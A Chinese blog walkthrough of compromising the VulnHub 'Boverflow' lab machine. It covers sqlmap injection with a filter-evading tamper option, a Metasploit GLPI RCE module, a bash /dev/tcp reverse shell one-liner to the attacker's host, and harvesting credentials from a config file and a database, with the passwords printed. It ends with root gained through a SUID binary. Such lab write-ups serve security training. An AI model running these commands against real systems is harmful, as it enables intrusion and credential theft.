vulnhub-Boverflow靶机渗透详细过程

已于 2024-07-17 10:24:29 修改
阅读量737 收藏 20
点赞数 28
文章标签: 安全 测试工具
于 2024-05-10 17:30:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nwonknu16/article/details/138669705
版权

文章目录

靶机地址

https://www.vulnhub.com/entry/boverflow-1,572/

靶机描述:
在这里插入图片描述

一、确认靶机地址

确认靶机地址为192.168.7.142(攻击机为192.168.7.133)

arp-scan -interface=eth1 --localnet

在这里插入图片描述

二、扫描开启的服务

靶机只开启了http和ssh服务,是比较标准的web类getshell

nmap -A 192.168.7.142 -p-

在这里插入图片描述

三、网站目录扫描

扫到一半直接断了,只扫出来admin目录,先去网页看看

dirsearch -u http://192.168.7.142

在这里插入图片描述

主页跳转到glpi目录,是一个glpi的登录页面
在这里插入图片描述

admin目录也是个登录界面,不过要简陋许多,看上去很可能有sql注入漏洞

四、sql注入测试

Burp抓个Post包存到txt,sqlmap开跑,刚开跑又断了
在这里插入图片描述

sqlmap -r '/root/Desktop/login.txt' --dbs --batch

在这里插入图片描述

回去看了眼靶机描述,果然限制了爆破手段,请求次数过多会被封一分钟ip

在这里插入图片描述

没办法,等一分钟加上–delay参数再跑,发现有时间盲注漏洞,发现glpi和basedb库(此处如果不成功可以加上tamper=between来绕过过滤)

sqlmap -r '/root/Desktop/login.txt' --dbs --batch --delay=5

在这里插入图片描述

爆glpi库,这个真的是太慢了,有请求次数限制加表名极长且多,挂后台一直跑着吧,去找找其他突破口

sqlmap -r '/root/Desktop/login.txt' -D glpi --tables --batch --tamper=between --delay=5

在这里插入图片描述

五、中间件漏洞getshell

查找一下glpi的漏洞,发现有RCE且可通过msf执行

searchsploit glpi

在这里插入图片描述

发现有两个poc,第二个时间太久了而且第一个rank是excellent,那就选第一个执行吧

msfconsole
search glpi

在这里插入图片描述

拿到webshell

use 0
options
set rhosts 192.168.7.142
set lhost 192.168.7.133
run
shell

在这里插入图片描述
在这里插入图片描述

六、提权到普通用户

msf的shell不太行,反弹下shell

攻击机:
nc -lvvp 2333
靶机:
/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.7.133/2333 0>&1'

在这里插入图片描述
在这里插入图片描述

一般从webshell提权到普通用户很大概率是通过敏感信息泄露的方式,常见的敏感文件存放位置包括/var/www下所有文件(重点是带bak、backup、config、database、db的文件),/var/backups和/home下用户文件
此处从当前所处的网站目录一级一级往上查找,果然在/var/www/html下发现可疑目录admin,并在admin目录下的db.php发现数据库用户名和密码

ls -al
cd admin
ls -al
cat db.php

数据库用户名和密码

fox:edfghjkl

在这里插入图片描述

连接数据库输完密码直接卡住,感觉是没开交互式的问题

mysql -u fox -p
edfghjkl

在这里插入图片描述

重新反弹shell并开启交互式,登录成功

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python3 /tmp/asdf.py

在这里插入图片描述

查看下basedb库的数据,passwd表内有fox的密码,一眼md5加密,怀疑这就是fox用户的系统密码

show databses;
use basedb;
show tables;
select * from passwd;

在这里插入图片描述

解密后尝试ssh登录,成功(md5解密网站https://www.somd5.com/)

ssh fox@192.168.7.142
moanapozzi

在这里插入图片描述
在这里插入图片描述

拿到第一个flag
在这里插入图片描述

七、普通用户提权到root

用户目录下有一个非常可疑的可执行文件mysudo,且有SUID

ls -al

在这里插入图片描述

这种很明显就是提权关键了,看了下发现是gcc编译的文件,结合靶机名boverflow感觉可能是溢出漏洞提权(overflow意为溢出)
在这里插入图片描述

执行下试试,发现有三次输入,分别是Command、Username、Password,fox用户没法执行

./mysudo

在这里插入图片描述

把它下下来用ida反编译看看,main函数调用了echo函数,echo函数中发现Username和Password的检验值就是username和password

scp -r fox@192.168.7.142:/home/fox/mysudo ./
moanapozzi

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

尝试后发现成功,执行id返回用户名为root

./mysudo
id
username
password

在这里插入图片描述

试试直接sudo -i,发现貌似带了空格就会导致Username和Password一起校验导致没法正常执行

./mysudo
sudo -i
username password

在这里插入图片描述

不带空格的直接提权命令,好像还真想不到,但不知道也可以自己写一个

echo '/bin/bash' > sekiyo
chmod 777 sekiyo

在这里插入图片描述

执行自己写的命令,直接拿到root权限,flag2到手

./mysudo
./sekiyo
username
password

在这里插入图片描述

八、结语

还以为要用溢出,结果也没用到
哦,差点忘了,最后还有个小彩蛋
在这里插入图片描述
结果靶机打完了才想起来之前挂后台的sqlmap,一看,还没跑完

只鱼Sekiyo
关注
  • 28
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Vulnhub-Lampiao 靶机渗透
Majula
01-30 2105
WalkthroughDownloadDescriptionPen TestingInformation GatheringExploitationReview Download Lampião: 1 ~ VulnHub VM 镜像文件,直接选择 打开虚拟机 即可。 Description Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lampião 1”. Get root!
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub靶机-easy_cloudantivirus 打靶
rumil的博客
04-12 843
加上以上四个密码,尝试进行爆破,创建user.txt和passwd.txt,将以上的用户信息和密码填入,进行爆破,使用hydra爆破,但是未果。此数据库文件为sqlite3,使用命令sqlite3查看一下,发现无此命令,那只能将其下载到本地,进行查看利用。执行过后,发现无反应,没有反弹,可能此linux当中的nc不支持-e参数,采用nc串联的方式。抓包,发现password参数,可进行注入,导入fuzzer字典,进行模糊测试。发现.c文件,并且已经编译好,恰好属主为root,那么利用一下,直接运行。
(三)vulhub专栏:Ecshop Sql注入、远程代码执行漏洞复现
云舒的博客
07-05 1476
Referer值未做任何验证可被控制直接引用 采用_echash做分割,且为定值:2.x:554fcae493e564ee0dc75bdf2ebf94ca、3.x:45ea207d7a2b68c49582d2d22adf953a insert_ads函数的sql拼接不规范导致sql注入 make_val函数拼接字符串,拼接用户输入内容。......
CTF学习-Vulnhub 靶场 之DARKHOLE
dengpan119的博客
03-30 3847
文章目录前期准备一、信息收集二、使用步骤1.引入库2.读入数据总结 前期准备 靶机地址:https://www.vulnhub.com/entry/darkhole-2,740/ kali攻击机ip:172.X.X.176 windows 10攻击机:172.X.X.189 靶机ip:172.X.X.188 一、信息收集 首先利用arp-scan -l 扫描到靶机IP: 然后使用nmap扫描靶机端口信息 发现靶机开放了22和80业务端口,还有一个敏感信息.git仓库文件,那就把仓库转过来看看,使用gi
【甄选靶场Vulnhub百个项目渗透——项目七:DerpNStink-1(sql注入,流量分析)
人间体佐菲的博客
08-23 2170
【专为新人甄选】Vulnhub百个项目渗透——项目七:DerpNStink-1
Vulnhub靶场渗透测试系列DC-8(sqlmap进行SQL注入和exim4命令提权)
qq_45722813的博客
12-10 3967
Vulnhub靶场渗透测试系列DC-8(sqlmap进行SQL注入和exim4命令提权) 靶机下载地址:https://www.vulnhub.com/entry/dc-8,367/ 将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机 使用nmap进行主机发现,获取靶机IP地址,命令nmap -Pn 192.168.172.1/24 再使用nmap扫描靶机操作系统,开放端口和对应服务等 靶机开放22端口对应ssh服务,80端口对应http服务,这也是一个drupal的网页
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
vulhub靶场sql注入漏洞复现
赵花花08042的博客
12-13 3273
Django JSONField/HStoreField SQL注入漏洞(CVE-2019-14234) https://github.com/vulhub/vulhub/blob/master/django/CVE-2019-14234/README.zh-cn.md https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247483996&idx=1&sn=4254dc0a54003cccb29dd42935f8ccea.
GPS叉车安全管理系统,远程监控管理车辆,保障叉车资产安全
jiuxindianzi的博客
08-16 435
九盾叉车监管系统利用GPS技术实现叉车全面监管,含IC卡指纹认证、无线实时测速、安全带报警器及小程序后台管理,提升安全性、效率及管理水平,降低运营成本。
AI安全-文生图
深度安全实验室
08-15 259
AI安全-文生图
等保测评中的安全需求分析:构建精准的信息安全防护体系
w13359990065的博客
08-15 690
在实施数字化转型的过程中,企业应将安全需求分析视为持续优化安全防护体系的关键环节,通过跨部门合作、员工培训、技术应用等策略,不断调整和优化安全需求,为业务的持续健康发展提供坚实的安全保障。某金融机构通过等保测评的指导,实施了详细安全需求分析,识别了其关键业务功能和信息资产,包括客户数据、交易系统等,基于风险评估的结果,制定了针对性的安全控制措施,如多因素认证、数据加密、网络隔离等,有效提升了信息安全防护水平。实施安全需求分析的过程中,企业可能面临一些挑战,如技术更新快、业务需求变化频繁、安全资源有限等。
[图解]片段16 ESS状态机图-SysMLEA建模住宅安全系统
最新发布
rolt的专栏
08-19 660
好,我们看,首先,电源管理这里,有两个状态
新160个crackme - 030-Acid Bytes.4
qq_41483767的博客
08-14 287
Delphi程序分析,upx脱壳,ida静态分析、动态调试,简单算法
CSP-CCF 202012-1 期末预测之安全指数
2301_79705447的博客
08-16 293
刚开始看到题目被没见过的ReLU吓到了,以为会很难,认真读懂题目后,感觉应该是我这些天做过的算最简单的了。所以说:不要被没见过的新鲜事物吓到,要迎难而上!
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值